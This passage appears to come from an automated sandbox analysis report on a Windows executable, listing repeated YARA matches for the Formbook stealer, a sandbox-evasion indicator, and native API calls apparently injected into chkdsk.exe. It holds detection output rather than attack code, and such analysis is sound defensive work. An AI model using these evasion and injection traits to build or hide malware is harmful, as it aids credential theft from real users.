Source: Yara match File source: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.415434999.0000000001660000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.389518706.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.372050188.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.343960936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

System Summary

Source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.GV8EJooYMIgEnEk.exe.28fd388.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
Source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.0.GV8EJooYMIgEnEk.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.0.GV8EJooYMIgEnEk.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.GV8EJooYMIgEnEk.exe.2979c1c.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
Source: 0.2.GV8EJooYMIgEnEk.exe.3a0a690.3.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.GV8EJooYMIgEnEk.exe.3a0a690.3.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.GV8EJooYMIgEnEk.exe.3a64cb0.4.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.GV8EJooYMIgEnEk.exe.3a64cb0.4.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.566934966.0000000004790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.566934966.0000000004790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.346719302.00000000038B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.346719302.00000000038B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000000.343584977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000000.343584977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.415734723.00000000016B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.415734723.00000000016B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.566609837.0000000000140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.566609837.0000000000140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.415434999.0000000001660000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.415434999.0000000001660000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.389518706.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.389518706.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.372050188.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.372050188.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000000.343960936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000000.343960936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: GV8EJooYMIgEnEk.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.GV8EJooYMIgEnEk.exe.28fd388.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
Source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.0.GV8EJooYMIgEnEk.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.0.GV8EJooYMIgEnEk.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.GV8EJooYMIgEnEk.exe.2979c1c.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
Source: 0.2.GV8EJooYMIgEnEk.exe.3a0a690.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.GV8EJooYMIgEnEk.exe.3a0a690.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.GV8EJooYMIgEnEk.exe.3a64cb0.4.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.GV8EJooYMIgEnEk.exe.3a64cb0.4.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.566934966.0000000004790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.566934966.0000000004790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.346719302.00000000038B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.346719302.00000000038B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000000.343584977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000000.343584977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.415734723.00000000016B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.415734723.00000000016B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.566609837.0000000000140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.566609837.0000000000140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.415434999.0000000001660000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.415434999.0000000001660000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.389518706.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.389518706.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.372050188.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.372050188.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000000.343960936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000000.343960936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: String function: 04D8B150 appears 35 times
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Code function: 3_2_004185E0 NtCreateFile, 3_2_004185E0
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Code function: 3_2_00418690 NtReadFile, 3_2_00418690
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Code function: 3_2_00418710 NtClose, 3_2_00418710
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Code function: 3_2_004187C0 NtAllocateVirtualMemory, 3_2_004187C0
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Code function: 3_2_004185DA NtCreateFile, 3_2_004185DA
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Code function: 3_2_0041870C NtClose, 3_2_0041870C
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DC95D0 NtClose,LdrInitializeThunk, 10_2_04DC95D0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DC9540 NtReadFile,LdrInitializeThunk, 10_2_04DC9540
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DC96D0 NtCreateKey,LdrInitializeThunk, 10_2_04DC96D0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DC96E0 NtFreeVirtualMemory,LdrInitializeThunk, 10_2_04DC96E0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DC9650 NtQueryValueKey,LdrInitializeThunk, 10_2_04DC9650
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DC9660 NtAllocateVirtualMemory,LdrInitializeThunk, 10_2_04DC9660
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DC9FE0 NtCreateMutant,LdrInitializeThunk, 10_2_04DC9FE0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DC9780 NtMapViewOfSection,LdrInitializeThunk, 10_2_04DC9780
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DC9710 NtQueryInformationToken,LdrInitializeThunk, 10_2_04DC9710
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DC9840 NtDelayExecution,LdrInitializeThunk, 10_2_04DC9840
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DC9860 NtQuerySystemInformation,LdrInitializeThunk, 10_2_04DC9860
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DC99A0 NtCreateSection,LdrInitializeThunk, 10_2_04DC99A0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DC9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 10_2_04DC9910
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DC9A50 NtCreateFile,LdrInitializeThunk, 10_2_04DC9A50
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DC95F0 NtQueryInformationFile, 10_2_04DC95F0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DC9560 NtWriteFile, 10_2_04DC9560
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DCAD30 NtSetContextThread, 10_2_04DCAD30
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DC9520 NtWaitForSingleObject, 10_2_04DC9520
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DC9670 NtQueryInformationProcess, 10_2_04DC9670
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DC9610 NtEnumerateValueKey, 10_2_04DC9610
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DC97A0 NtUnmapViewOfSection, 10_2_04DC97A0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DCA770 NtOpenThread, 10_2_04DCA770
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DC9770 NtSetInformationFile, 10_2_04DC9770
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DC9760 NtOpenProcess, 10_2_04DC9760
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DCA710 NtOpenProcessToken, 10_2_04DCA710
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DC9730 NtQueryVirtualMemory, 10_2_04DC9730
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DC98F0 NtReadVirtualMemory, 10_2_04DC98F0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DC98A0 NtWriteVirtualMemory, 10_2_04DC98A0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DCB040 NtSuspendThread, 10_2_04DCB040
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DC9820 NtEnumerateKey, 10_2_04DC9820
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DC99D0 NtCreateProcessEx, 10_2_04DC99D0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DC9950 NtQueueApcThread, 10_2_04DC9950
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DC9A80 NtOpenDirectoryObject, 10_2_04DC9A80
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DC9A10 NtQuerySection, 10_2_04DC9A10
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DC9A00 NtProtectVirtualMemory, 10_2_04DC9A00
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DC9A20 NtResumeThread, 10_2_04DC9A20
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DCA3B0 NtGetContextThread, 10_2_04DCA3B0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04DC9B00 NtSetValueKey, 10_2_04DC9B00
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04AA85E0 NtCreateFile, 10_2_04AA85E0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04AA8690 NtReadFile, 10_2_04AA8690
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04AA87C0 NtAllocateVirtualMemory, 10_2_04AA87C0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04AA8710 NtClose, 10_2_04AA8710
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04AA85DA NtCreateFile, 10_2_04AA85DA
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 10_2_04AA870C NtClose, 10_2_04AA870C
Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.346719302.00000000038B9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUI.dllF vs GV8EJooYMIgEnEk.exe
